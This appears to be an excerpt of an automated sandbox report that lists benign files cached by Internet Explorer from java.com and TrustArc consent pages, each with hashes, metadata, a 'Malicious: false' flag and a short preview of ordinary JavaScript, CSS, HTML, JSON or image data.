SSDEEP:	192:57TGITdVKY0G1R8GbSM7MF1fpem4T2J1tvFnj1E6mnNUy3c8:BGS971R8GbSM3T2JFnj6NUy3c8
MD5:	68D31E97572528100371F837AF8603F5
SHA1:	9FEF653E0EF4BC5AF642CDAB7E8ECD486F821FF8
SHA-256:	5D21BBDC017320D093CFCF73892F099F99868910D131A37E7C324BC428684F97
SHA-512:	69BC641294AD5C1657369AB4C748BB0201F7309499205C40BB29341238198943439E246647F6D8BA9FAAB332AF7A3FB7C346B093ACE462046AD147645E460C3B
Malicious:	false
IE Cache URL:	https://consent.trustarc.com/notice?domain=oracle.com&c=teconsent&js=bb&noticeType=bb&text=true&gtm=1&language=en
Preview:	function _truste_eumap(){truste=self.truste\|\|{};truste.eu\|\|(truste.eu={});truste.util\|\|(truste.util={});.(new Image(1,1)).src=("https://consent.trustarc.com/log".replace("http:","https:"))+"?domain=oracle.com&country=ch&state=&behavior=expressed&c="+(((1+Math.random())65536)\|0).toString(16).substring(1);.truste.util.error=function(l,h,k){k=k\|\|{};var j=h&&h.toString()\|\|"",e=k.caller\|\|"";if(h&&h.stack){j+="\n"+h.stack.match(/(@\|at)[^\n\r\t]/)[0]+"\n"+h.stack.match(/(@\|at)[^\n\r\t]*$/)[0].}truste.util.trace(l,j,k);if(truste.util.debug\|\|!h&&!l){return}var d={apigwlambdaUrl:"https://api-js-log.trustarc.com/error",enableJsLog:false};.if(d.enableJsLog){delete k.caller;delete k.mod;delete k.domain;delete k.authority;k.msg=l;var i=new (self.XMLHttpRequest\|\|self.XDomainRequest\|\|self.ActiveXObject)("MSXML2.XMLHTTP.3.0");.i.open("POST",d.apigwlambdaUrl,true);i.setRequestHeader&&i.setRequestHeader("Content-type","application/json");.i.send(truste.util.getJSON({info:truste.util.getJSON(k)\|\|"",erro

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\s_code_remote[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	3135
Entropy (8bit):	5.343899292674586
Encrypted:	false
SSDEEP:	48:TIx98yes/Y1josQ45kIIJYaygOObTVno4b6GabIufdB:MPTh/Y1E4xISObBrZabddB
MD5:	013C759D9E735927DE9443BA35B4FDDB
SHA1:	2D14300D76E34B41EFDD5A8EA57E4A79859571F4
SHA-256:	BFF04C18BF3D41EA1E9AE7B5C7694782D282907AE8B3BE78B7FED1ACD5D3DB61
SHA-512:	0613D1DAB0F61A085229982D9DEEDB50B30A6481B072912B8C4868E5BB973391615A2612394AA4E2F5214174CA5078ECD9D940DE508B062855D6B48793B921F7
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/s_code_remote.js
Preview:	/!.######################################################..# S_CODE_REMOTE.JS..# Version: 1.00..# BUILD DATE: Tue Jul 17 2018 12:05:01 GMT-0400 (Eastern Daylight Time)..# COPYRIGHT ORACLE CORP 2018 [UNLESS STATED OTHERWISE]..######################################################./.try{oracle.truste.api.getConsentDecision().consentDecision;oracle.truste.api.getConsentDecision().source}catch(err){var oracle=oracle\|\|{};oracle.truste={};oracle.truste.api={};(function(){var trusteStorageItemName="truste.eu.cookie.notice_preferences";this.getCookieName=function(){return"notice_preferences"};this.getStorageItemName=function(){return trusteStorageItemName}}).apply(oracle.truste);(function(){var trusteCommon=oracle.truste;function getCookie(cookieKey){for(var name=cookieKey+"=",cookieArray=document.cookie.split(";"),i=0;i<cookieArray.length;i++){for(var c=cookieArray[i];" "==c.charAt(0);)c=c.substring(1);if(0==c.indexOf(name))return c.substring(name.length,c.length)}return null}function getLo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\screen[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	20825
Entropy (8bit):	4.994143793467963
Encrypted:	false
SSDEEP:	384:UoURDmGjjKJzOh+7V6iKFd7FAtDHFxQFW23:WiGj+zOI7Vq7FAlFSFV3
MD5:	A74B0D2CD7E657A5CB55B9BC1B6985C3
SHA1:	5D4CDC3E796E06B2542450F4D0533F02E26D9C09
SHA-256:	8CF75A638B4DB506BC4B28FB12AB33432AC5DA8DD775EC721B4627F8D50246A4
SHA-512:	547331AC9047504133D53AED25675BAC90A3FB0FD166E536C23BD0EBD07DDEA75B586428A8E6C4F280A97C66293DE3286A12A8C3FE8AA669C7A8C01202C034ED
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/css/screen.css
Preview:	html, body, div, span, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, code, del, dfn, em, img, q, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {. margin: 0;. padding: 0;. border: 0;. font-weight: inherit;. font-style: inherit;. font-size: 100%;. font-family: inherit;. vertical-align: baseline.}..body {. line-height: 1.5.}..table {. border-collapse: separate;. border-spacing: 0.}..caption, th, td {. text-align: left;. font-weight: normal.}..table, td, th {. vertical-align: middle.}..blockquote:before, blockquote:after, q:before, q:after {. content: "".}..blockquote, q {. quotes: """".}..a img {. border: 0.}..body {. font-size: 75%;. color: #222;. background: #fff;. font-family: "Helvetica Neue", Helvetica, Arial, sans-serif.}..h1, h2, h3, h4, h5, h6 {. font-weight: normal;. color: #111.}..h1 {. font-size: 3em;. line-height: 1;. margin-bottom: .5em.}..h2 {. font-si

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\theme.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	86057
Entropy (8bit):	5.293478370265226
Encrypted:	false
SSDEEP:	1536:X+SiP1GohxDDogabxkHB4SpcEkMj/t7KZ/52uFGEeJul1BgJ2tM5Po+bQuo4kQ4H:iNV7KZMoWISJQMdkuo4kQ47GK/
MD5:	EB519B683BF8B78B57BBCCB92F2B6FFA
SHA1:	02906CED3B1DE28743DCB6CB7BF09F9E89E1FDAC
SHA-256:	7ED7C6A415CE8873EE944D54FBD3B886CC9BB0D62B5B6A84E05EBE963C4005AD
SHA-512:	29594674F002C9080CD277950EC1C8DB87DA77949C1885AA8A56BF2742FADCB5DD9B240BC3C5DB0F9AF95EDA84CD1044F8CF497B96FE8BD4F75556A263FFECB1
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/theme.min.js
Preview:	!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,h=n.hasOwnProperty,a=h.toString,l=a.call(Object),v={};function m(e,t){var n=(t=t\|\|E).createElement("script");n.text=e,t.head.appendChild(n).parentNode.removeChild(n)}function c(e,t){return t.toUpperCase()}var f="3.2.1",k=function(e,t){return new k.fn.init(e,t)},p=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,d=/^-ms-/,y=/-([a-z])/g;function x(e){var t=!!e&&"length"in e&&e.length,n=k.type(e);return"function"!==n&&!k.isWindow(e)&&("array"===n\|\|0===t\|\|"number"==typeof t&&0<t&&t-1 in e)}k.fn=k.prototype={jquery:f,constructor:k,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.c

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\10.cache[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	248272
Entropy (8bit):	5.681509824428412
Encrypted:	false
SSDEEP:	3072:f43Meg5QsrHKe1HvmGkzezfe88br/EGnXTzIJZXfp8kG/q:f43MeIrqe5mbije3b7EGnXoJZXfphG/q
MD5:	260AB54FAE6CECF25FE9A36C9F442BFE
SHA1:	41F77DB15798F91B8F7BCC0F32BF2861570A3858
SHA-256:	0A9073F8A864D021091181726653951F100DFCABB6D1C04D91C4FD0E74A4E35A
SHA-512:	273BDA292DC06ECB285DF401F4A2A4FCE4BB01BCFF97AB77C02AB1E9273D25929DDE55048693134C529D85C06E547C95E149E3648752E183C2741ED706F0ACE7
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/defaultpreferencemanager/deferredjs/67B873F492AD87C25B322202223D7A22/10.cache.js
Preview:	function Rb(){}.function Vb(){}.function up(){}.function Kp(){}.function Qp(){}.function Wp(){}.function bq(){}.function zq(){}.function Oq(){}.function er(){}.function lr(){}.function $u(){}.function oU(){}.function sU(){}.function xU(){}.function HU(){}.function oV(){}.function rV(){}.function uV(){}.function xV(){}.function vW(){}.function QW(){}.function rX(){}.function uX(){}.function BX(){}.function EX(){}.function KX(){}.function EY(){}.function HY(){}.function G_(){}.function M7(){}.function P7(){}.function wbb(){}.function lcb(){}.function ocb(){}.function Meb(){}.function efb(){}.function hfb(){}.function kfb(){}.function nfb(){}.function qfb(){}.function ufb(){}.function xfb(){}.function Vjb(){}.function Vzb(){}.function izb(){}.function Szb(){}.function Jtb(){}.function Ayb(){}.function Kyb(){}.function HMb(){}.function YNb(){}.function NOb(){}.function ROb(){}.function VOb(){}.function LPb(){}.function yQb(){}.function SSb(){}.function ZSb(){}.function eTb(){}.function lTb

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\2B2KCDL9.htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	5147
Entropy (8bit):	5.154022406877804
Encrypted:	false
SSDEEP:	96:r8qy7YxdYhAVYYn3MCysvq15MwxXkqnSqcO/2C1gigij:r8/0xChAaJvGqtx0qnSq9/bj
MD5:	14C0A5A0AF9411825A689ADE15E42B51
SHA1:	F94CC78F1D464582CEF3217C183C7C3B012E54A3
SHA-256:	5D59D71FA30604E26C815B2BCFEA777BEF1564467E2FF9B1B4DC45CA2EE0F6FE
SHA-512:	E046C5DF4CEA8E473ACAB8BE624BB30946D03F4CEEC81A03E1826EAD692FE704682E4097E9E6D39CCCC4BD469205E241A6FFEE7DF84082945D8C1A5CE6F7C839
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/?type=oracle6&site=oracle.com&action=notice&country=ch&locale=en&behavior=expressed&gtm=1&layout=default_eu&irm=undefined&from=https://consent.trustarc.com/
Preview:	<!doctype html>.<html>.<head>.<meta http-equiv="content-type" content="text/html; charset=UTF-8">.<meta name="viewport" content="width=device-width, initial-scale=1.0" />.<link href="images/favicon.ico" rel="shortcut icon" type="image/x-icon">.<title>TrustArc Preference Manager</title>..<meta name="keywords"..content="online trust, online privacy, email privacy, email safety, consumer privacy, brand trust, online seals, prevent spyware, privacy alert" />.<meta name="description"..content="TrustArc Cookie Consent Manager helps ensure online privacy compliance." />..<script type="text/javascript">..var baseCDNUrl = "//consent-st.trustarc.com/get?name=";..var QueryString = function() {...// This function is anonymous, is executed immediately and ...// the return value is assigned to QueryString!...var query_string = {};...var query = window.location.search.substring(1);...var vars = query.split("&");...for ( var i = 0; i < vars.length; i++) {....var pair = vars[i].split("=");....// If fi

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\67B873F492AD87C25B322202223D7A22.cache[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	143674
Entropy (8bit):	5.662154626152911
Encrypted:	false
SSDEEP:	3072:Mtj1ozeBNXuWgNQtFY5/L74N8teyZlK8dxIN:c1ozeBNXutQbUfdxs
MD5:	7429A361B4376E6D5CE5757A46C963E9
SHA1:	76E6AF42B04A0ACD7CD2B71D3F74A22F4EED7F7B
SHA-256:	636435D9E1B631536BA8FBD41B01B1D75246EAFC97E68A4FAD7585F09409D596
SHA-512:	A8E4F3EDFD03895AFEE0FE1F7DE59F7B461C375A76CA109A8A0FEFE543C6FDA2ECCBFA02058D564E60C8D1E1CCA1A54B7815D33FF8AC5B1BF7C0DA48957C152D
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/defaultpreferencemanager/67B873F492AD87C25B322202223D7A22.cache.html
Preview:	<!doctype html>.<html><head><meta charset="UTF-8" /><script>var $gwt_version = "2.5.1";var $wnd = parent;var $doc = $wnd.document;var $moduleName, $moduleBase;var $strongName = '67B873F492AD87C25B322202223D7A22';function __gwtStartLoadingFragment(frag) { return $moduleBase + 'deferredjs/' + $strongName + '/' + frag + '.cache.js';};function __gwtInstallCode(code) {var head = document.getElementsByTagName('head').item(0);var script = document.createElement('script');script.type = 'text/javascript';script.text = code;head.appendChild(script);};var $stats = $wnd.__gwtStatsEvent ? function(a) {return $wnd.__gwtStatsEvent(a);} : null,$sessionId = $wnd.__gwtStatsSessionId ? $wnd.__gwtStatsSessionId : null;$stats && $stats({moduleName:'defaultpreferencemanager',sessionId:$sessionId,subSystem:'startup',evtGroup:'moduleStartup',millis:(new Date()).getTime(),type:'moduleEvalStart'});</script></head><body><script> .function Pj(){}.function P_(){}.function nk(){}.function $q(){}.function zt(){

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\EuPreferenceManager[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	27745
Entropy (8bit):	5.042943398466011
Encrypted:	false
SSDEEP:	384:xDMuxcCdWdamlRHq038IiBVT6lXcyfBWfTbQe97jl7yE:R1xcC3mlwIirT6lMEBKEeFIE
MD5:	182FC39AFF61D22162DFD04D282791E2
SHA1:	737ED8C224ED9313F5325AEC984CDE6043974C51
SHA-256:	1EA22EF5CC12712E650AC15269E8E7B75904F47246CE6EB04BF0FCD42F8BED77
SHA-512:	C20168EDB22C2B2AA9454150EB7DEBB55373C7999E294482AB540DD550BF4FE443D05EA45A62D2816F59D5C4C4F11EDD4E17C23916B61787670688901828F6F9
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/EuPreferenceManager.css
Preview:	html, body, div, span, applet, object, iframe,.h1, h2, h3, h4, h5, h6, p, blockquote, pre,.a, abbr, acronym, address, big, cite, code,.del, dfn, em, font, img, ins, kbd, q, s, samp,.small, strike, strong, sub, sup, tt, var,.b, u, i, center,.dl, dt, dd, ol, ul, li,.fieldset, form, label, legend,.table, caption, tbody, tfoot, thead, tr, th, td {. background: transparent;. border: 0;. margin: 0;. padding: 0;. vertical-align: baseline;.}..body { font-size: 12px; font-family: "Helvetica Neue",Helvetica,Arial,sans-serif; line-height: 20px; }.body.main { background: url(images/bg.png) no-repeat center 0; line-height: 20px; }.body.pbg { background: #fff url(images/pbg.jpg) repeat-y 1px 0; }.input, textarea, select { font-size: 12px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; }..../*INDEX.HTML*/..mainheader {}..mainHeader h1 { color: #2C2D31; font-size: 18px; display: inline-block; }..accept-decline-buttons { float: right; }.#accept_all_button{ background: no

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\config[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4218
Entropy (8bit):	5.021925195373321
Encrypted:	false
SSDEEP:	48:Y1UfpXYGBc7ay+WvnNtiwhbxuToLZdnU/tcst4vEv2rQEv22UUtVtYtqPqrtymt6:+piMcTBcA4vBbLaqyJfVVXTPq
MD5:	4A4FC672B5EBE2DDE04DA76B8E370B69
SHA1:	A69679CD8FD81F32CA6F502928B02ABD658DCEAC
SHA-256:	8BADF642362F57F98CD051FCBFDCA7231850DA58E2AD6438EA30E5A289F61DA0
SHA-512:	5FE0602E47EDC61252FF7868A2FAE7949D20F4D0E576FB15A81B17C76C344AD6C23D1EE123489028396537289A9CC1979241BC1FF660953568D72D7CD2CEE020
Malicious:	false
Preview:	{"h.key":"T79A9-GDDN2-93ZD5-M6HUR-X83QX","h.d":"java.com","h.t":1620124510521,"h.cr":"cec1441e8af39bf2398d79d8d01b55eb602420be","session_id":"7e546f3f-4410-49c2-8e04-72124e76ef99","site_domain":"java.com","beacon_url":"//684dd30c.akstat.io/","autorun":false,"instrument_xhr":true,"beacon_interval":60,"BW":{"enabled":false},"RT":{"session_exp":1800},"ResourceTiming":{"enabled":true,"splitAtPath":true},"History":{"enabled":true,"auto":true},"Errors":{"enabled":true,"monitorTimeout":true,"monitorEvents":true,"maxErrors":10,"sendInterval":500},"Continuity":{"enabled":true},"PageParams":{"xhr":"subresource","pageGroups":[{"type":"Regexp","parameter1":"\\/[\\w-]{2,5}\\/$","parameter2":"Homepage","on":["navigation"]},{"type":"Regexp","parameter1":"\\/[\\w-]{2,5}\\/download\\/help\\/","parameter2":"Help Articles","on":["navigation"]},{"type":"Regexp","parameter1":"\\/[\\w-]{2,5}\\/download\\/faq\\/","parameter2":"FAQ Articles","on":["navigation"]},{"type":"Regexp","parameter1":"\\/[\\w-]{2,5}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\cookie_inneriframe[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	2008
Entropy (8bit):	5.157980344637123
Encrypted:	false
SSDEEP:	48:R+AWZDXeNYhGtcO4S63v0SaATPsLXQa+/NT:GbcciSaATkLgV
MD5:	D09BEB4594BA45F809C9DB7E4429551B
SHA1:	6E2D0D8C237175DB1509E707B7166042D65C694B
SHA-256:	A2DE091C86C5A7B6DCC572EB6E5A76C2CD72CE27A2042A8DC2974F15B33566ED
SHA-512:	2D5373C167742FFB7654D528BE59029BB930221588A49B27FD3AF17EB9457EC6E41D76F1C040BF21E35A8E94B372AE5F87E95B91C4EB5F70CFFF584B314DCFF0
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/cookie_inneriframe.html
Preview:	<html>.<body>.<script type="text/javascript">. function getSameSiteValue(){. var isHttps = ((self.location.protocol == "https:") ? " Secure;" : ""); //conditionally adds Secure tag only if parent frame is HTTPS. var sameSiteValue = isHttps ? "None;" : "Lax;";. var cookieAttrb = (" SameSite=" + sameSiteValue) + isHttps;. return cookieAttrb;. }...function sameSiteCompatible(userAgent){...return !hasWebKitSameSiteBug(userAgent);..}...function hasWebKitSameSiteBug(userAgent){...return isIosVersion(12, userAgent) \|\| (checkMacOSVersion(userAgent) && checkIfSafariBrowser(userAgent)) \|\| checkChromeVersion(userAgent);..}...function isIosVersion(major, userAgent){...var retVal = true;....var start = userAgent.indexOf('OS');...if( ( userAgent.indexOf('iPhone') > -1 \|\| userAgent.indexOf('iPad') > -1 ) && start > -1 ){....var iosVersion = window.Number( userAgent.substr( start + 3, 3 ).replace( '_', '.'));.....if(iosVersion > major){.....retVal = false;....}...}els

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\favicon[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
Category:	downloaded
Size (bytes):	1150
Entropy (8bit):	5.4824647268315285
Encrypted:	false
SSDEEP:	12:NWlFMVaUsQsV444444wcAKyZmvebayz1Tqn2bz75rajZ0a7VN/GR6abfaHl/:EMwUOVToYvU9Y2n75rajj7WDg
MD5:	8E39F067CC4F41898EF342843171D58A
SHA1:	AB19E81CE8CCB35B81BF2600D85C659E78E5C880
SHA-256:	872BAD18B566B0833D6B496477DAAB46763CF8BDEC342D34AC310C3AC045CEFD
SHA-512:	47CD7F4CE8FCF0FC56B6FFE50450C8C5F71E3C379ECFCFD488D904D85ED90B4A8DAFA335D0E9CA92E85B02B7111C9D75205D12073253EED681868E2A46C64890
Malicious:	false
IE Cache URL:	https://www.java.com/favicon.ico
Preview:	............ .h.......(....... ..... .................................}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..........\|.........................................................\|...p...............u..z\..z\..z\..z\..z\..z\..z\...............p...v...........................................................v...z..................qU..eG..eH..eG..qU......iL...u...........z..................................................jM...w..........................fH..iK..sV..gJ..fH..sV..........fH...v......................................n..m............}c...w.....................................'v.......`.......................................................e.......e...e.......................................................i......o....p.................................................v....q............................................................z...+z................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\i18n.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	1190
Entropy (8bit):	5.22354092284205
Encrypted:	false
SSDEEP:	24:cnNQ3iRE19tuafAXP5ucA3R0sFZSMz0fec5AQxofPp16sPvV2oonQSj1pf:qUXtFGP5ucAysFZIfLAffBUopSz
MD5:	CDC1B9E99E06127C245C3E082B62C8DB
SHA1:	3584F7B136059DF16096E84A14B7093FBB1C464F
SHA-256:	E2CDEC61D821EA2D31A5232EE702D6BC3AB73CFAEF75211399CFFB48F8139D37
SHA-512:	4FE8C7FD00698DFA54FA99E509DBFBAF8D722FE06C71673288FD4E96FF85B87A604B8995ABB0E6D7ED3142237C1AB7DA8E23CE222C6DD36D66EF7A8A0A3184D2
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/dependencies/i18n.min.js
Preview:	!function(){"use strict";function d(o,n,e,a,t,r){n[o]&&(e.push(o),!0!==n[o]&&1!==n[o]\|\|a.push(t+o+"/"+r))}function y(o,n,e,a,t){var r=a+n+"/"+t;require._fileExists(o.toUrl(r+".js"))&&e.push(r)}function w(o,n,e){var a;for(a in n)!n.hasOwnProperty(a)\|\|o.hasOwnProperty(a)&&!e?"object"==typeof n[a]&&(!o[a]&&n[a]&&(o[a]={}),w(o[a],n[a],e)):o[a]=n[a]}var j=/(^.(^\|\/)nls(\/\|$))([^\/])\/?([^\/]*)/;define(["module"],function(o){var h=o.config?o.config():{};return{version:"2.0.6",load:function(o,r,i,n){(n=n\|\|{}).locale&&(h.locale=n.locale);var e,l,a,t=j.exec(o),u=t[1],f=t[4],s=t[5],c=f.split("-"),g=[],v={},p="";if(t[5]?e=(u=t[1])+s:(e=o,s=t[4],f=(f=h.locale)\|\|(h.locale="undefined"==typeof navigator?"root":(navigator.languages&&navigator.languages[0]\|\|navigator.language\|\|navigator.userLanguage\|\|"root").toLowerCase()),c=f.split("-")),n.isBuild){for(g.push(e),y(r,"root",g,u,s),l=0;l<c.length;l++)a=c[l],y(r,p+=(p?"-":"")+a,g,u,s);r(g,function(){i()})}else r([e],function(a){var o,t=[];for(d("root",

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\java_home_photo2[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 320x303, frames 3
Category:	downloaded
Size (bytes):	18684
Entropy (8bit):	7.941482665517741
Encrypted:	false
SSDEEP:	384:MD9jCVd+P1avntf3LFbzluWnanYPayLhhRgBuTAzZ4:Y9jCPOgvtf3LFbhuVIayLRgITkZ4
MD5:	F31AE0A9ACBC9D62A93E4A942C762A2D
SHA1:	1F9AAFA48280BB10EC6E055C95468EC7C7AC1A58
SHA-256:	61177657E9643FE669E02FE1971011EA7E1159D42ECC80F1C0E36BA505AD1416
SHA-512:	3710959B8CADAC9B3B4C0B9D08B7663391404C952124D5FE85E4F1F1DF0E36E5641BBD92481D4F4D8F9CBE3EC46C99FE35048413C007A3F627B2AA2BDB8FDEB0
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/home/java_home_photo2.jpg
Preview:	......JFIF.....d.d......Ducky.......K.....&Adobe.d.......................0...H............................................................................................................................................./.@.......................................................................................... 1..0@!.P"2.A#..`$B3pC%.......................!1AQ..q"0@a.2B.#. ..R..br.3C..$.P...Scs4....................P`!....................!1A.Qa@q. 0..P..........................F.e]3...-6.3.#1p.Js............:.]9.t....s[\....J...zc....4...............p[1...<6.v../+y..M~....b...........j[.e.3.h:gazzF..;c.K.2...21={-;=..:eP........A.K..8.u.n"m&!..&.c..C;.<...n]..............Zo..s....d...lmH.!.........c.f}.l..........W...e.o.>.._;.Jf&..e=,f..../....\$........[#.SO...t....1..le...X.V.^D.QRi..g}..GL3R...........\;4M.."....s....\|r..R.:..f.\Rz.>.............n\|.O...jS..q.d3./.>..;.1{.L......>..Io..M...........M>z...v.[u?/..p....4.\.W.+l,oK.^...>.[\.........h\|..O .

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\jv0_oracle[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 91 x 22
Category:	downloaded
Size (bytes):	919
Entropy (8bit):	6.420171258574878
Encrypted:	false
SSDEEP:	24:DUifmRlw/Uvzy6yDGr+492MDfywVZ2Nje:3fk8Gr+IekZ2Nje
MD5:	9AD2F2B528AB933E785FD31BA5C642D6
SHA1:	8F6519118DC9F35642C046A989302AF11EDD708D
SHA-256:	9DD4760AD78DA6F14A0EDC582C03982A9392AC676244FC762A7B0BA059C24812
SHA-512:	DB643B0921949F79B95DB9F63659E6FA988BFEFEC4F4536AFF3FF8E00C6FD5D2FAAA586F1E3039734372BCFA74BE1D50BEF7529B47C1E9D0C62FC2296F0DF07E
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/footer/jv0_oracle.gif
Preview:	GIF89a[.............33.......<<.....................................cc..........??....KK.99.{{....~~....--.......00....*....ii.WW....NN.............ZZ.HH....TT...................``.rr.......ff....EE.......$$.ll.oo.66.xx..........QQ.......BB.]]....''.!!................................................................................................................................................!.......,....[..........................<;......9.........@'...-........(...I.5..-...../.....#...............1...=.1.2.A.J$.........1...@...#..!...t2t-..#...`.....3......"!....W..BB...@......!..I...B.X. ......x9...P.4.(hI...X"J.@..P.6I.#..F..,..".......tl. ....r. ERl...t.F!QH!..tP.......@.D!@.R..$..@..CJ.1.....E6.$@..H....A..B.g. ....)a...........f#a0Lc...8l..)H...,.........L<.f.....!.....!s.)`.....7.........D\|.{.....dt.[7.*.O..@.A.@.F..0..3p..",.6......0.<..s. ..8X.T0.\7.(...,...0.(.4.h.8..<......;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\layout[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	322
Entropy (8bit):	4.560479140514086
Encrypted:	false
SSDEEP:	6:DxlY1efZT0a6Oi+xDfQMQMEv1UCTDRnhW56eNzSlMv1H:LFTVrZxDBZE93hW56kz59H
MD5:	A41911032F556116B5525B553DA01655
SHA1:	FFB2132F6CF6F610E70790651DE88E63CE6FF140
SHA-256:	3E4AA2CB4D372FCBEBA22C9AA960E8779F44B6C9584A8C555409B2CA5D742897
SHA-512:	DFA850FAEE04B38F15653FF551773E727BB1933B8431EC825D90597FF12067D1C327A5EE4FC24032BE64BF012ECCB574B16CCAC24E3479A5FCDD44BC8FDFF098
Malicious:	false
IE Cache URL:	https://www.java.com/_compdelivery/_cache_0933/JCOM-SimplePage_Detail/assets/layout.html
Preview:	{{{variantScr}}}.<div class="row">. {{#fields}}. <div class="{{divClass}}">. <div class="jvc0w2" data-hydrate="{{hydrateData}}">. {{{body}}}. </div>. </div>. {{#navWidgets}}. <div id="leftNavSection" class="jvcs0 clearfix">{{{widgetContent}}}</div>. {{/navWidgets}}. {{/fields}}.</div>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\promise-polyfill.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	3873
Entropy (8bit):	4.934703049448279
Encrypted:	false
SSDEEP:	96:2sGCUBf6HofDX3Z3QL8t5wvDhk98ez8UX9afVBKkfSqiOH:s68l3sayVKzBNaB6q5
MD5:	7ECB657D16B1441F47B83F777AC75DCF
SHA1:	EF2F2A0DD519D2D1CE8D15B00352C26E6BB65762
SHA-256:	E17AE17F90AE983832F3709E67DE0F7902FE1014568410534615235A158D7AF0
SHA-512:	60AF9B02352E61D8CF92C6C6408208B149F9860605B1CFA75E0C76D56C1BCBD32FFAB25DF16647D8545ED517654E316ED6FC651A26BDFD1AA650C719B57F81AC
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/promise-polyfill.min.js
